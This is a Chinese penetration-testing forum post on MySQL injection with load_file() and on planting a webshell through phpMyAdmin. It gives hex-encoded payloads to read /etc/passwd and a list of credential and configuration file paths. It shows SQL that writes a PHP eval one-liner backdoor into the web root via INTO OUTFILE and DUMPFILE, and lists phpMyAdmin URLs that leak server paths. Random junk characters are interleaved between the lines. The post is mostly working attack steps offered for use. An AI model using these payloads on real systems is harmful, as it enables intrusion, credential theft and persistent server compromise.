中国网络渗透测试联盟
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
[打印本页]
作者:
admin
时间:
2013-7-13 19:27
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
利用load_file()获取敏感文件与phpmyadmin拿webshell
3 I1 j5 |: o' {6 F' ]. s5 n
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里
& X) M0 j# K* b9 S
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:
9 f7 x) U! W4 e1 N4 N2 X( \
: j) v6 j) l9 v6 _' N& J5 v
1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
) I3 v: K2 H5 A3 w4 F( T. b3 M
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
2 B5 b% S' I: K9 V% O B3 \; n' h. l
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.
4 d# }, }, `8 C T$ V
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
' \) i& _( Y( e/ d
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
7 b" O/ I' q S8 c+ L- h* G8 i
5、crogram FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件
* Q& _& _6 F6 L6 s7 z: W1 h( x4 }
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
2 E0 c7 _ N- v9 U( e; c
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
" T+ s" H( M6 V7 J4 A
8、d:APACHEApache2confhttpd.conf
, _2 ~6 Y1 _% K9 `7 ^; J
9、Crogram Filesmysqlmy.ini
; Y- E/ y; d4 o9 B2 c
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
, t" I# z! W7 Z4 L
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
3 R& I; L, y6 L5 Q! S3 k6 H5 o
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
, o& F( o' j3 h. o6 M% G; d& g* Q9 L
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
. U5 R% K5 n& u+ B
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
) f5 h. ]! S: F3 t# i9 S
15、 /etc/sysconfig/iptables 本看防火墙策略
1 f6 D U2 _0 u3 ~/ z. O
16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置
; B- ~% L2 m4 L2 r' t
17 、/etc/my.cnf MYSQL的配置文件
4 V1 o) i! Q& m& ~3 P
18、 /etc/redhat-release 红帽子的系统版本
" P. y) e; Q2 A2 u# c& r
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
6 N7 X. v" V7 V( L5 K M- }6 d& q, F1 H
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
" c3 N# U; n" O! |6 L+ h4 w
21、/usr/local/app/php5/lib/php.ini //PHP相关设置
1 I6 R% W p3 m3 N5 r
22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
8 I! h1 U9 G9 {4 ]$ @- O4 @% }3 \
23、crogram FilesRhinoSoft.comServ-UServUDaemon.ini
! D& _! v, Z# _
24、c:windowsmy.ini
+ r0 ]; l4 s8 \& t4 r" l8 \
---------------------------------------------------------------------------------------------------------------------------------
! N) w5 I7 U$ H; d6 c
1.如何拿到登陆密码. 自己想办法
, \' s9 L' k& y3 S) X
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
) b! o, W' c4 c5 l/ x1 n/ X: A
3.选择一个Database.运行以下语句.
# K8 u% e9 i& X8 U0 {& V! b7 v& z
----start code---
* R3 D# v; C8 {0 V
Create TABLE a (cmd text NOT NULL);
( A; I# T% w# j- {
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
# n! Y9 p8 g& T' h6 Y
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
; w( \. f3 @/ x7 T7 B
Drop TABLE IF EXISTS a;
! @6 h! N( O+ k: y! E% S5 z
----end code---
5 |# g: L. I1 g/ e- _9 o: P& V
4.如果没什么意外.对应网站得到webshell
* u6 S B2 `; m1 F4 o
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
" ~% P# _& p. _$ }" {
补充:还可以直接用dumpfile来得到shell
, V6 {& N8 A' g9 `, E
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
/ ^0 m/ A, J6 v7 D5 ^! u1 j3 _. P" V
加密部分为 lanker 一句话 密码为 cmd
! K1 t4 Z M1 A$ S
--------------------------------------------------------------------------------------------------------
+ g: k0 c0 F% T4 q4 j" u
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -
% d A' A$ L8 t" O) v2 x7 z$ e4 |
; f; k+ v2 |3 ~/ L& t- d/ ? `
http://target/phpmyadmin/libraries/string.lib.php
* A, S; d+ W9 o- ^; d' w' F
http://target/phpmyadmin/libraries/string.lib.php
$ j9 X6 t% B( j$ F2 R- Q
http://target/phpmyadmin/libraries/database_interface.lib.php
) W5 y, n* Q- r/ y9 Z4 `, s
http://target/phpmyadmin/libraries/db_table_exists.lib.php
: ^' L5 R0 |/ }' b
http://target/phpmyadmin/libraries/display_export.lib.php
! P+ s) ?$ H1 d0 y5 ?
http://target/phpmyadmin/libraries/header_meta_style.inc.php
1 ]3 Q, P$ c+ e) x
http://target/phpmyadmin/libraries/mcrypt.lib.php
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2